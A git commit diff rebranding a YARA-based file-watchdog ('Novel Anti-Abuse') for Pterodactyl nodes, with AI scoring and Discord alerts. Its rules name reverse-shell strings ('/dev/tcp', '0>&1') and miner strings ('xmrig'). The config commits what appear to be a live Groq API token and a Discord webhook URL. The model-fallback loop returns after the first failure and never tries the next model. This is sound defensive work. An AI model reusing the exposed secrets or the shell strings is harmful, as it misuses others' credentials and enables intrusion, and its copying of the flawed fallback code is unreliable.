pushed
This commit is contained in:
parent
39b8c90fec
commit
229d21c3e2
4
.gitignore
vendored
4
.gitignore
vendored
@ -1,3 +1,3 @@
|
|||||||
aaaastart.sh
|
start.sh
|
||||||
config.toml
|
config.toml
|
||||||
__pycache__
|
__pycache__
|
||||||
|
31
README.md
31
README.md
@ -1,24 +1,32 @@
|
|||||||
# RADAR
|
# Novel, Anti-Abuse
|
||||||
|
|
||||||
RADAR is a watchdog software to watch file modifications, deletions, movements, creations and scan such files with YARA rules and later analyse them with AI (configurable) and send to your discord webhook (configurable)!
|
Introducing Anti-Abuse by Novel.
|
||||||
|
|
||||||
# Install
|
Anti-Abuse is an ✨ FREE, Open-Sourced radar based on yara rules built for pterodactyl nodes.
|
||||||
|
|
||||||
Firstly ensecure you have python3 and pip installed.
|
## Features
|
||||||
|
1. Watchdog based real-time monitoring.
|
||||||
|
2. Easily customizable by [Yara Rule](https://yara.readthedocs.io/en/stable/writingrules.html).
|
||||||
|
3. Various Integrations(discord webhook, etc).
|
||||||
|
4. Easy re-check action through AI-Based Analysis.
|
||||||
|
|
||||||
Secondly install packages we are using for RADAR:
|
## Installation
|
||||||
|
|
||||||
```python
|
Requirements: python, keyboard, brain
|
||||||
|
|
||||||
|
1. Install requirements
|
||||||
|
```bash
|
||||||
pip install watchdog tomllib yara
|
pip install watchdog tomllib yara
|
||||||
```
|
```
|
||||||
|
|
||||||
|
2. Configure your config.toml and yara rules
|
||||||
Thirdly run configure config.toml, upload your YARA (.yar and .yara) signatures in /signatures and then finally run RADAR!
|
Thirdly run configure config.toml, upload your YARA (.yar and .yara) signatures in /signatures and then finally run RADAR!
|
||||||
|
|
||||||
```python
|
```python
|
||||||
python3 main.py
|
python3 main.py
|
||||||
```
|
```
|
||||||
|
|
||||||
Done! You're running RADAR watchdog.
|
Done! You're now running Anti-Abuse.
|
||||||
|
|
||||||
# Tips
|
# Tips
|
||||||
|
|
||||||
@ -27,6 +35,11 @@ Tip 1: You don't know how to write YARA rules?
|
|||||||
|
|
||||||
# Reporting security issue or vulnerability
|
# Reporting security issue or vulnerability
|
||||||
|
|
||||||
Please contact us directly per email `lisahonkay@gmail.com` or using duscord `@_lisa_ns_` or `@inxtagram` to report security issue or vulnerability!
|
Please contact us on email:
|
||||||
|
|
||||||
Made with <3 in python by inxtagram and _lisa_ns_, licensed under [GNU GENERAL PUBLIC LICENSE, Version 3](http://lhhomeserver.ddns.net:3000/Lisa_Stuff/RADAR/src/branch/main/LICENSE)
|
|Maintainer|Contact|
|
||||||
|
|----|---|
|
||||||
|
|Lisa|lisahonkay@gmail.com, `@_lisa_ns_` on discord|
|
||||||
|
|Lin|contact@who.ad, @inxtagram` on discord|
|
||||||
|
|
||||||
|
Made with ❤️ by inxtagram and `_lisa_ns_`, licensed under [GNU GENERAL PUBLIC LICENSE, Version 3](http://lhhomeserver.ddns.net:3000/Lisa_Stuff/RADAR/src/branch/main/LICENSE)
|
9
TODO.md
9
TODO.md
@ -4,8 +4,9 @@ TODO:
|
|||||||
2. Integration with pterodactyl (ref. py-dactyl or https://dashflo.net/docs/api/pterodactyl/v1/)
|
2. Integration with pterodactyl (ref. py-dactyl or https://dashflo.net/docs/api/pterodactyl/v1/)
|
||||||
3. Integration with pelican (ref? https://pelican.dev/)
|
3. Integration with pelican (ref? https://pelican.dev/)
|
||||||
4. Integration with docker
|
4. Integration with docker
|
||||||
5. Several AI Models support, if one fails to respond another model from the list will be used. Example: models = ["model1","model2","model3","etc"]
|
|
||||||
6. Multi threading support (for scans)
|
6. Multi threading support (for scans)
|
||||||
7. Multiple pathes support. Example: watchdog_path = ["./path/one","/root/test/","./etc"]
|
9. Ability to add ignore path or ignore file (multiple support too!)
|
||||||
8. Includes ability to add ignore path in integrations or use path in integration , of course with multiple pathes support too
|
|
||||||
9. Ability to add ignore path or ignore file (multiple support too!)
|
~~7. Multiple pathes support. Example: watchdog_path = ["./path/one","/root/test/","./etc"]~~
|
||||||
|
~~5. Several AI Models support, if one fails to respond another model from the list will be used. Example: models = ["model1","model2","model3","etc"]~~
|
||||||
|
~~8. Includes ability to add ignore path in integrations or use path in integration , of course with multiple pathes support too~~
|
||||||
|
1
aaaastart.sh
Normal file
1
aaaastart.sh
Normal file
@ -0,0 +1 @@
|
|||||||
|
ss
|
14
config.toml
14
config.toml
@ -1,4 +1,6 @@
|
|||||||
|
|
||||||
ver = "250325d"
|
ver = "250325d"
|
||||||
|
machineID = "node1"
|
||||||
|
|
||||||
#*************************************************#
|
#*************************************************#
|
||||||
# #
|
# #
|
||||||
@ -8,7 +10,7 @@ ver = "250325d"
|
|||||||
|
|
||||||
[LANGUGAE.english]
|
[LANGUGAE.english]
|
||||||
|
|
||||||
radarStarted = "RADAR Started with in - {}s."
|
novelStarted = "Novel(Anti Abuse) Started within - {}s."
|
||||||
|
|
||||||
|
|
||||||
#**************************************************#
|
#**************************************************#
|
||||||
@ -33,7 +35,7 @@ watchdogPath = "./"
|
|||||||
SignaturePath = "./signatures"
|
SignaturePath = "./signatures"
|
||||||
|
|
||||||
watchdogIgnorePath = ["./signatures"]
|
watchdogIgnorePath = ["./signatures"]
|
||||||
watchdogIgnoreFile = ["main.py"]
|
watchdogIgnoreFile = ["./main.py", "./config.toml", "es/common.yara"]
|
||||||
|
|
||||||
#**************************************************#
|
#**************************************************#
|
||||||
# #
|
# #
|
||||||
@ -44,16 +46,16 @@ watchdogIgnoreFile = ["main.py"]
|
|||||||
[INTEGRATION.AI]
|
[INTEGRATION.AI]
|
||||||
|
|
||||||
enabled = true
|
enabled = true
|
||||||
generate_model = "llama-3.1-8b-instant" # for home usage gemma3:1b recommended, for Groq llama-3.1-8b-instant
|
generate_models = ["llama-3.2-90b-vision-preview","llama-3.3-70b-versatile","llama-3.3-70b-specdec","llama-3.2-11b-vision-preview","llama3-70b-8192","llama-3.1-8b-instant","llama3-8b-8192","llama-3.2-3b-preview","llama-3.2-1b-preview"] # for home usage gemma3:1b recommended, for Groq llama-3.1-8b-instant
|
||||||
generate_endpoint = "http://IP:PORT/api/generate" # Can be empty if using groq
|
generate_endpoint = "http://IP:PORT/api/generate" # Can be empty if using groq
|
||||||
use_groq = true
|
use_groq = true
|
||||||
groq_api_token = "" # Get one at https://console.groq.com/keys
|
groq_api_token = "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" # Get one at https://console.groq.com/keys
|
||||||
|
|
||||||
|
|
||||||
prompt = "Analyze the given code and return an abuse score (0-10) with a brief reason. Example abuses: Crypto Miner, Shell Access, Nezha Proxy (VPN/Proxy usage), Disk Filling, Tor, DDoS, Abusive Resource Usage. Response format: '**5/10** <your reason>'. No extra messages."
|
prompt = "Analyze the given code and return an abuse score (0-10) with a brief reason. Example abuses: Crypto Mining, Shell Access, Nezha Proxy (VPN/Proxy usage), Disk Filling, Tor, DDoS, Abusive Resource Usage. Response format: '**5/10** <your reason>'. No extra messages."
|
||||||
|
|
||||||
[INTEGRATION.DISCORD]
|
[INTEGRATION.DISCORD]
|
||||||
|
|
||||||
enabled = true
|
enabled = true
|
||||||
webhook_url = ""
|
webhook_url = "https://discord.com/api/webhooks/1353420407511973948/knrSGrfLDvi_60Mese1LAIBmkrK05a_L4PmyyE7R7wvGZEXiWdzrRT8pdicj0aHe88m4"
|
||||||
truncate_text = true # Used only if AI INTEGRATION is enabled, trunclates text if true to maxium allowed characters or when false splits in few webhook messages.
|
truncate_text = true # Used only if AI INTEGRATION is enabled, trunclates text if true to maxium allowed characters or when false splits in few webhook messages.
|
||||||
|
24
main.py
24
main.py
@ -3,22 +3,32 @@ import time, os, tomllib
|
|||||||
|
|
||||||
from utils.Logger import Log
|
from utils.Logger import Log
|
||||||
from utils.WatchdogHandler import DirWatcher
|
from utils.WatchdogHandler import DirWatcher
|
||||||
#endregion
|
#endregion
|
||||||
|
|
||||||
#region Initialize
|
#region Initialize
|
||||||
t = time.time()
|
t = time.time()
|
||||||
with open("config.toml", "rb") as f:
|
with open("config.toml", "rb") as f:
|
||||||
data = tomllib.load(f)
|
data = tomllib.load(f)
|
||||||
|
|
||||||
|
Log.v(str(data))
|
||||||
path = data['DETECTION']['watchdogPath']
|
path = data['DETECTION']['watchdogPath']
|
||||||
|
|
||||||
|
|
||||||
Log.v("""
|
Log.v("""
|
||||||
____ ____
|
|
||||||
/ __ \\____ _/ __ \\____ ______
|
o o 8
|
||||||
/ /_/ / __ `/ / / / __ `/ ___/
|
8b 8 8
|
||||||
/ _, _/ /_/ / /_/ / /_/ / /
|
8`b 8 .oPYo. o o .oPYo. 8
|
||||||
/_/ |_|\\__,_/_____/\\__,_/_/ (ver. {})
|
8 `b 8 8 8 Y. .P 8oooo8 8
|
||||||
|
8 `b8 8 8 `b..d' 8. 8
|
||||||
|
8 `8 `YooP' `YP' `Yooo' 8
|
||||||
|
..:::..:.....:::...:::.....:..
|
||||||
|
::::::::::::::::::::::::::::::
|
||||||
|
|
||||||
|
Product - ANTI-ABUSE
|
||||||
|
Release - {}
|
||||||
|
License - GNU GENERAL PUBLIC LICENSE, Version 3
|
||||||
|
|
||||||
""".format(data['ver']))
|
""".format(data['ver']))
|
||||||
#endregion
|
#endregion
|
||||||
|
|
||||||
@ -26,7 +36,7 @@ if __name__ == "__main__":
|
|||||||
with DirWatcher(path, interval=1) as watcher:
|
with DirWatcher(path, interval=1) as watcher:
|
||||||
watcher.run()
|
watcher.run()
|
||||||
|
|
||||||
Log.s(data['LANGUGAE']['english']['radarStarted'].format(str(round(time.time() - t, 1))))
|
Log.s(data['LANGUGAE']['english']['novelStarted'].format(str(round(time.time() - t, 1))))
|
||||||
try:
|
try:
|
||||||
while True:
|
while True:
|
||||||
time.sleep(1)
|
time.sleep(1)
|
||||||
|
@ -1,51 +1,56 @@
|
|||||||
|
rule CHINESE_NEZHA_ARGO {
|
||||||
rule CHIENESE_NEZHA_ARGO
|
strings:
|
||||||
{
|
$a1 = "TkVaSEE=" // Base64 for "NEZHA"
|
||||||
strings:
|
$a2 = "tunnel.json"
|
||||||
$a1 = "TkVaSEE="
|
$a3 = "vless"
|
||||||
$a2 = "tunnel.json"
|
$a4 = "dmxlc3M=" // Base64 for "vless"
|
||||||
$a3 = "vless"
|
$a5 = "/vmess"
|
||||||
$a4 = "dmxlc3M="
|
$a6 = "L3ZtZXNz" // Base64 for "/vmess"
|
||||||
$a5 = "/vmess"
|
$a7 = "V0FSUA==" // Base64 for "WARP"
|
||||||
$a6 = "L3ZtZXNz"
|
$a8 = "/eooce/"
|
||||||
$a7 = "V0FSUA=="
|
$a9 = "ARGO_AUTH"
|
||||||
$a8 = "/eooce/"
|
$a10 = "--edge-ip-version"
|
||||||
$a9 = "ARGO_AUTH"
|
$a11 = "LS1lZGdlLWlwLXZlcnNpb24=" // Base64 for "--edge-ip-version"
|
||||||
$a10 = "--edge-ip-version"
|
$a12 = "sub.txt"
|
||||||
$a11 = "LS1lZGdlLWlwLXZlcnNpb24="
|
$a13 = "Server\x20is\x20running\x20on\x20port\x20"
|
||||||
$12 = "sub.txt"
|
$a14 = "nysteria2"
|
||||||
$13 = "Server\x20is\x20running\x20on\x20port\x20"
|
$a15 = "openssl req"
|
||||||
$14 = "nysteria2"
|
|
||||||
$15 = "openssl req"
|
|
||||||
|
|
||||||
condition:
|
condition:
|
||||||
2 of ($a1, $a2, $a3, $a4, $a5, $a6, $a7, $a8, $a9, $a10, $a11, $12, $13, $14, $15)
|
2 of ($a*)
|
||||||
}
|
}
|
||||||
|
|
||||||
rule OBFSCATED_CODE
|
rule OBFUSCATED_CODE {
|
||||||
{
|
|
||||||
meta:
|
meta:
|
||||||
description = "Detects an obfuscated script"
|
description = "Detects an obfuscated script"
|
||||||
|
|
||||||
strings:
|
strings:
|
||||||
$f1 = "_0x" nocase
|
$f1 = "0x" nocase
|
||||||
$f2 = "\x20" nocase
|
$f2 = "x20" nocase
|
||||||
$f3 = "\x0a" nocase
|
$f3 = "x0a" nocase
|
||||||
$f5 = "openssl req -new -x509" nocase
|
|
||||||
$f6 = "cert.pem" nocase
|
|
||||||
$f7 = "private.key" nocase
|
|
||||||
condition:
|
condition:
|
||||||
2 of ($f*)
|
2 of ($f1, $f2, $f3)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
rule OVERLOAD_CRYPTO_MINER {
|
||||||
rule OVERLOAD_CRYPTO_MINER
|
meta:
|
||||||
{
|
|
||||||
meta:
|
|
||||||
ref = "https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e"
|
ref = "https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e"
|
||||||
strings:
|
strings:
|
||||||
$a1 = "stratum+tcp"
|
$a1 = "stratum+tcp"
|
||||||
|
$a2 = "xmrig"
|
||||||
|
$a3 = "crypto"
|
||||||
|
|
||||||
condition:
|
condition:
|
||||||
$a1
|
any of them
|
||||||
}
|
}
|
||||||
|
|
||||||
|
rule REVERSE_SHELL {
|
||||||
|
strings:
|
||||||
|
$a1 = "0>&1"
|
||||||
|
$a2 = "sh"
|
||||||
|
$a3 = "-i"
|
||||||
|
$a4 = "0<&196"
|
||||||
|
$a5 = "<>/dev/tcp"
|
||||||
|
$a6 = "socket.socket"
|
||||||
|
|
||||||
|
condition:
|
||||||
|
2 of them
|
||||||
|
}
|
@ -1,7 +1,6 @@
|
|||||||
#region Imports
|
#region Imports
|
||||||
import os
|
import os, yara, tomllib
|
||||||
import yara
|
from utils.Logger import Log
|
||||||
import tomllib
|
|
||||||
#endregion
|
#endregion
|
||||||
|
|
||||||
#region Variables
|
#region Variables
|
||||||
@ -29,17 +28,17 @@ def scan(src):
|
|||||||
error_messages = {}
|
error_messages = {}
|
||||||
|
|
||||||
for filename in os.listdir(data['DETECTION']['SignaturePath']):
|
for filename in os.listdir(data['DETECTION']['SignaturePath']):
|
||||||
if filename.endswith((".yara")):
|
if filename.endswith(".yara") or filename.endswith(".yar"): # both are yara extensions ok
|
||||||
rule_path = os.path.join(data['DETECTION']['SignaturePath'], filename)
|
rule_path = os.path.join(data['DETECTION']['SignaturePath'], filename)
|
||||||
try:
|
try:
|
||||||
rules = yara.compile(filepath=rule_path)
|
rules = yara.compile(filepath=rule_path)
|
||||||
file_matches = rules.match(data=src)
|
file_matches = rules.match(data=src)
|
||||||
if file_matches:
|
if file_matches:
|
||||||
matches[filename] = file_matches
|
matches[filename] = file_matches
|
||||||
# for match in file_matches:
|
#for match in file_matches:
|
||||||
# print(f" - Rule: {match.rule}")
|
# Log.v(f" - Rule: {match.rule}")
|
||||||
except yara.Error as e:
|
except yara.Error as e:
|
||||||
|
Log.e(e)
|
||||||
error_messages[filename] = e
|
error_messages[filename] = e
|
||||||
|
|
||||||
return matches, error_messages
|
return matches, error_messages
|
||||||
#endregion
|
#endregion
|
@ -1,14 +1,18 @@
|
|||||||
"""Context manager for basic directory watching.
|
"""
|
||||||
|
CREDIT
|
||||||
|
|
||||||
Includes a workaround for <https://github.com/gorakhargosh/watchdog/issues/346>.
|
Context manager for basic directory watching.
|
||||||
|
- <https://github.com/gorakhargosh/watchdog/issues/346>.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from datetime import datetime, timedelta
|
from datetime import datetime, timedelta
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from time import sleep
|
from time import sleep
|
||||||
|
import threading
|
||||||
|
import time
|
||||||
from typing import Callable, Self
|
from typing import Callable, Self
|
||||||
from utils.Logger import Log
|
from utils.Logger import Log
|
||||||
import tomllib, time
|
import tomllib
|
||||||
|
|
||||||
from watchdog.events import FileSystemEvent, FileSystemEventHandler
|
from watchdog.events import FileSystemEvent, FileSystemEventHandler
|
||||||
from watchdog.observers import Observer
|
from watchdog.observers import Observer
|
||||||
@ -29,17 +33,35 @@ if not isinstance(paths, list):
|
|||||||
ignore_paths = data['DETECTION'].get('watchdogIgnorePath', [])
|
ignore_paths = data['DETECTION'].get('watchdogIgnorePath', [])
|
||||||
ignore_files = data['DETECTION'].get('watchdogIgnoreFile', [])
|
ignore_files = data['DETECTION'].get('watchdogIgnoreFile', [])
|
||||||
|
|
||||||
|
|
||||||
def s(input_dict):
|
def s(input_dict):
|
||||||
return [
|
return [
|
||||||
{"name": key, "value": '\n'.join(' - ' + str(item) for item in items)}
|
{"name": key, "value": '\n'.join(' - ' + str(item) for item in items)}
|
||||||
for key, items in input_dict.items()
|
for key, items in input_dict.items()
|
||||||
]
|
]
|
||||||
|
|
||||||
|
|
||||||
def c(d):
|
def c(d):
|
||||||
c=0
|
count = 0
|
||||||
for key in d:
|
for key in d:
|
||||||
if isinstance(d[key], list):
|
if isinstance(d[key], list):
|
||||||
c += len(d[key])
|
count += len(d[key])
|
||||||
return c
|
return count
|
||||||
|
|
||||||
|
|
||||||
|
def analysis(event_path: str, file_content: str, flag_type: str):
|
||||||
|
"""
|
||||||
|
Process file events in a separate thread.
|
||||||
|
This function scans the file content, and if flagged,
|
||||||
|
performs AI analysis and sends a webhook notification.
|
||||||
|
"""
|
||||||
|
results = scan(file_content)
|
||||||
|
if results[0]:
|
||||||
|
Log.s(f"Flagged {event_path}")
|
||||||
|
analysis = ai_analyse(file_content)
|
||||||
|
msg = f"Total Flagged Pattern: {str(c(results[0]))}\n\n{analysis}"
|
||||||
|
webhook(event_path, s(results[0]), msg)
|
||||||
|
|
||||||
|
|
||||||
class DirWatcher:
|
class DirWatcher:
|
||||||
"""Run a function when a directory changes."""
|
"""Run a function when a directory changes."""
|
||||||
@ -49,18 +71,18 @@ class DirWatcher:
|
|||||||
def __init__(
|
def __init__(
|
||||||
self,
|
self,
|
||||||
watch_dir: Path,
|
watch_dir: Path,
|
||||||
interval: int = 0.2,
|
interval: float = 0.2,
|
||||||
cooldown: int = 0.1,
|
cooldown: float = 0.1,
|
||||||
):
|
):
|
||||||
if interval < self.min_cooldown:
|
if interval < self.min_cooldown:
|
||||||
raise ValueError(
|
raise ValueError(
|
||||||
f"Interval of {interval} seconds is less than the minimum cooldown of"
|
f"Interval of {interval} seconds is less than the minimum cooldown of "
|
||||||
f" {self.min_cooldown} seconds."
|
f"{self.min_cooldown} seconds."
|
||||||
)
|
)
|
||||||
if cooldown < self.min_cooldown:
|
if cooldown < self.min_cooldown:
|
||||||
raise ValueError(
|
raise ValueError(
|
||||||
f"Cooldown of {cooldown} seconds is less than the minimum cooldown of"
|
f"Cooldown of {cooldown} seconds is less than the minimum cooldown of "
|
||||||
f" {self.min_cooldown} seconds."
|
f"{self.min_cooldown} seconds."
|
||||||
)
|
)
|
||||||
self.watch_dir = watch_dir
|
self.watch_dir = watch_dir
|
||||||
self.interval = interval
|
self.interval = interval
|
||||||
@ -72,7 +94,7 @@ class DirWatcher:
|
|||||||
ModifiedFileHandler(scan, self.cooldown), self.watch_dir, recursive=True
|
ModifiedFileHandler(scan, self.cooldown), self.watch_dir, recursive=True
|
||||||
)
|
)
|
||||||
|
|
||||||
Log.s(data['LANGUGAE']['english']['radarStarted'].format(str(round(time.time() - t, 5))))
|
Log.s(data['LANGUGAE']['english']['novelStarted'].format(str(round(time.time() - t, 5))))
|
||||||
self.observer.start()
|
self.observer.start()
|
||||||
return self
|
return self
|
||||||
|
|
||||||
@ -99,71 +121,78 @@ class DirWatcher:
|
|||||||
|
|
||||||
|
|
||||||
class ModifiedFileHandler(FileSystemEventHandler):
|
class ModifiedFileHandler(FileSystemEventHandler):
|
||||||
"""Handle modified files."""
|
"""Handle modified files using threading for processing."""
|
||||||
|
|
||||||
def __init__(self, func: Callable[[FileSystemEvent], None], cooldown: int):
|
def __init__(self, func: Callable[[FileSystemEvent], None], cooldown: float):
|
||||||
self.cooldown = timedelta(seconds=cooldown)
|
self.cooldown = timedelta(seconds=cooldown)
|
||||||
self.triggered_time = datetime.min
|
self.triggered_time = datetime.min
|
||||||
|
|
||||||
def on_any_event(self, event):
|
def ignore_event(self, event: FileSystemEvent) -> bool:
|
||||||
for ignore_path in ignore_paths:
|
for ignore_path in ignore_paths:
|
||||||
if event.src_path.startswith(ignore_path):
|
if event.src_path.startswith(ignore_path):
|
||||||
return True
|
return True
|
||||||
for ignore_file in ignore_files:
|
for ignore_file in ignore_files:
|
||||||
if event.src_path.endswith(ignore_file):
|
if event.src_path.endswith(ignore_file):
|
||||||
return True
|
return True
|
||||||
if(event.src_path == "."):
|
if event.src_path == ".":
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
|
||||||
|
def on_any_event(self, event: FileSystemEvent):
|
||||||
|
if self.ignore_event(event):
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
def on_modified(self, event: FileSystemEvent):
|
def on_modified(self, event: FileSystemEvent):
|
||||||
try:
|
if self.ignore_event(event):
|
||||||
if (datetime.now() - self.triggered_time) > self.cooldown:
|
return
|
||||||
src = open(event.src_path, "r").read()
|
if (datetime.now() - self.triggered_time) > self.cooldown:
|
||||||
if(event.src_path == "."):
|
try:
|
||||||
return
|
with open(event.src_path, "r") as f:
|
||||||
|
src = f.read()
|
||||||
Log.v(f"FILE MODF | {event.src_path}")
|
Log.v(f"FILE MODF | {event.src_path}")
|
||||||
r = scan(src)
|
# Process in a separate thread
|
||||||
if r[0]:
|
threading.Thread(target=analysis, args=(event.src_path, src, "modification")).start()
|
||||||
Log.s(f"Flagged {event.src_path}")
|
|
||||||
analyse = ai_analyse(src)
|
|
||||||
webhook(event.src_path, s(r[0]), f"Total Flagged Pattern: {str(c(r[0]))}\n\n{analyse}")
|
|
||||||
self.triggered_time = datetime.now()
|
self.triggered_time = datetime.now()
|
||||||
except: pass
|
except Exception:
|
||||||
|
pass
|
||||||
|
|
||||||
def on_moved(self, event: FileSystemEvent):
|
def on_moved(self, event: FileSystemEvent):
|
||||||
|
if self.ignore_event(event):
|
||||||
try:
|
return
|
||||||
if (datetime.now() - self.triggered_time) > self.cooldown:
|
if (datetime.now() - self.triggered_time) > self.cooldown:
|
||||||
|
try:
|
||||||
Log.v(f"FILE MOV | {event.src_path} > {event.dest_path}")
|
Log.v(f"FILE MOV | {event.src_path} > {event.dest_path}")
|
||||||
r = scan(event.src_path)
|
# For moved events, you might choose to scan the original or destination file.
|
||||||
if r[0]:
|
# Here, we'll scan the source path.
|
||||||
Log.s(f"Flagged {event.src_path}")
|
with open(event.src_path, "r") as f:
|
||||||
analyse = ai_analyse(event.src_path)
|
src = f.read()
|
||||||
webhook(event.src_path, s(r[0]), f"Total Flagged Pattern: {str(c(r[0]))}\n\n{analyse}")
|
threading.Thread(target=analysis, args=(event.src_path, src, "moved")).start()
|
||||||
self.triggered_time = datetime.now()
|
self.triggered_time = datetime.now()
|
||||||
except: pass
|
except Exception:
|
||||||
|
pass
|
||||||
|
|
||||||
def on_deleted(self, event: FileSystemEvent):
|
def on_deleted(self, event: FileSystemEvent):
|
||||||
try:
|
if self.ignore_event(event):
|
||||||
if (datetime.now() - self.triggered_time) > self.cooldown:
|
return
|
||||||
|
if (datetime.now() - self.triggered_time) > self.cooldown:
|
||||||
|
try:
|
||||||
Log.v(f"FILE DEL | {event.src_path}")
|
Log.v(f"FILE DEL | {event.src_path}")
|
||||||
self.triggered_time = datetime.now()
|
self.triggered_time = datetime.now()
|
||||||
except: pass
|
except Exception:
|
||||||
|
pass
|
||||||
|
|
||||||
def on_created(self, event: FileSystemEvent):
|
def on_created(self, event: FileSystemEvent):
|
||||||
try:
|
if self.ignore_event(event):
|
||||||
print(1)
|
return
|
||||||
if (datetime.now() - self.triggered_time) > self.cooldown:
|
if (datetime.now() - self.triggered_time) > self.cooldown:
|
||||||
|
try:
|
||||||
if event.is_directory:
|
if event.is_directory:
|
||||||
return None
|
return
|
||||||
else:
|
else:
|
||||||
Log.v(f"file created: {event.src_path}")
|
Log.v(f"file created: {event.src_path}")
|
||||||
r = scan(event.src_path)
|
with open(event.src_path, "r") as f:
|
||||||
if r[0]:
|
content = f.read()
|
||||||
Log.s(f"Flagged {event.src_path}")
|
threading.Thread(target=analysis, args=(event.src_path, content, "creation")).start()
|
||||||
analyse = ai_analyse(event.src_path)
|
self.triggered_time = datetime.now()
|
||||||
webhook(event.src_path, s(r[0]), f"Total Flagged Pattern: {str(c(r[0]))}\n\n{analyse}")
|
except Exception:
|
||||||
|
pass
|
||||||
self.triggered_time = datetime.now()
|
|
||||||
except: pass
|
|
||||||
|
@ -11,7 +11,7 @@ with open("./config.toml", "rb") as f:
|
|||||||
|
|
||||||
enabled = data["INTEGRATION"]["AI"]["enabled"]
|
enabled = data["INTEGRATION"]["AI"]["enabled"]
|
||||||
generate_endpoint = data["INTEGRATION"]["AI"]["generate_endpoint"]
|
generate_endpoint = data["INTEGRATION"]["AI"]["generate_endpoint"]
|
||||||
generate_model = data["INTEGRATION"]["AI"]["generate_model"]
|
model_list = data["INTEGRATION"]["AI"]["generate_models"]
|
||||||
use_groq = data["INTEGRATION"]["AI"]["use_groq"]
|
use_groq = data["INTEGRATION"]["AI"]["use_groq"]
|
||||||
groq_api = data["INTEGRATION"]["AI"]["groq_api_token"]
|
groq_api = data["INTEGRATION"]["AI"]["groq_api_token"]
|
||||||
prompt = data["INTEGRATION"]["AI"]["prompt"]
|
prompt = data["INTEGRATION"]["AI"]["prompt"]
|
||||||
@ -22,52 +22,56 @@ if use_groq:
|
|||||||
#endregion
|
#endregion
|
||||||
|
|
||||||
def generate_response(data):
|
def generate_response(data):
|
||||||
"""Generate a response using the Groq API."""
|
"""Generate a response using the Groq or OLLAMA API."""
|
||||||
try:
|
error_messages = []
|
||||||
# Create headers
|
for generate_model in model_list:
|
||||||
headers = {
|
try:
|
||||||
"Content-Type": "application/json",
|
headers = {
|
||||||
}
|
"Content-Type": "application/json",
|
||||||
|
}
|
||||||
|
|
||||||
# Add authorization header if using Groq
|
# Add authorization header if using Groq
|
||||||
if use_groq:
|
if use_groq:
|
||||||
headers["Authorization"] = f"Bearer {groq_api}"
|
headers["Authorization"] = f"Bearer {groq_api}"
|
||||||
|
|
||||||
# Create payload
|
# Create payload
|
||||||
payload = {
|
payload = {
|
||||||
"model": generate_model,
|
"model": generate_model,
|
||||||
"temperature": 1,
|
"temperature": 1,
|
||||||
"max_completion_tokens": 1024,
|
"max_completion_tokens": 1024,
|
||||||
"top_p": 1,
|
"top_p": 1,
|
||||||
"stream": False,
|
"stream": False,
|
||||||
"stop": None,
|
"stop": None,
|
||||||
}
|
}
|
||||||
|
|
||||||
# Conditional message structure for Groq
|
# Conditional message structure for Groq
|
||||||
if use_groq:
|
if use_groq:
|
||||||
payload["messages"] = [
|
payload["messages"] = [
|
||||||
{
|
{
|
||||||
"role": "system",
|
"role": "system",
|
||||||
"content": f"{prompt}"
|
"content": f"{prompt}"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"role": "user",
|
"role": "user",
|
||||||
"content": f"```code\n{data}\n```"
|
"content": f"```code\n{data}\n```"
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
else:
|
else:
|
||||||
payload["prompt"] = f"Using this data: {data}. Respond to this prompt: {prompt}"
|
payload["prompt"] = f"Using this data: {data}. Respond to this prompt: {prompt}\n"
|
||||||
|
|
||||||
response = requests.post(generate_endpoint, json=payload, headers=headers)
|
response = requests.post(generate_endpoint, json=payload, headers=headers)
|
||||||
response.raise_for_status()
|
response.raise_for_status()
|
||||||
if use_groq:
|
if use_groq:
|
||||||
return response.json()["choices"][0]["message"]["content"]
|
return response.json()["choices"][0]["message"]["content"]
|
||||||
else:
|
else:
|
||||||
return response.json()
|
return response.json()
|
||||||
|
|
||||||
except requests.exceptions.RequestException as e:
|
except requests.exceptions.RequestException as e:
|
||||||
Log.e(f"Failed to generate response: {e}")
|
Log.e(f"Failed to generate response: {e}")
|
||||||
return None
|
Log.e(f"Using model: {generate_model}")
|
||||||
|
error_messages.append(f"Model {generate_model} failed: {e}")
|
||||||
|
return None
|
||||||
|
return f"All models failed. Errors: {error_messages}"
|
||||||
|
|
||||||
|
|
||||||
def ai_analyse(src):
|
def ai_analyse(src):
|
||||||
@ -81,9 +85,9 @@ def ai_analyse(src):
|
|||||||
#Log.s(f"Generated Response: {response}")
|
#Log.s(f"Generated Response: {response}")
|
||||||
return response
|
return response
|
||||||
else:
|
else:
|
||||||
Log.e("AI did not respond.")
|
return "No AI Description provided for this action; check config.toml maybe?"
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
Log.e(f"Unexpected error: {e}")
|
Log.e(f"Unexpected error: {e}")
|
||||||
else:
|
else:
|
||||||
return "AI integration is disabled in the configuration, enable AI integration for AI File Analyse."
|
return "No AI Description provided for this action; check config.toml maybe?"
|
||||||
return None
|
return None
|
||||||
|
@ -59,7 +59,7 @@ def webhook(file_path, yara_matches, ai=""):
|
|||||||
if truncate_text_flag:
|
if truncate_text_flag:
|
||||||
# Single embed if truncated
|
# Single embed if truncated
|
||||||
embeds.append({
|
embeds.append({
|
||||||
"title": "⚠️ WATCHDOG ALERT ⚠️",
|
"title": f"⚠️ WATCHDOG ALERT ⚠️ - {config_data['machineID']}",
|
||||||
"description": description,
|
"description": description,
|
||||||
"color": 65280,
|
"color": 65280,
|
||||||
"fields": yara_matches,
|
"fields": yara_matches,
|
||||||
|
Reference in New Issue
Block a user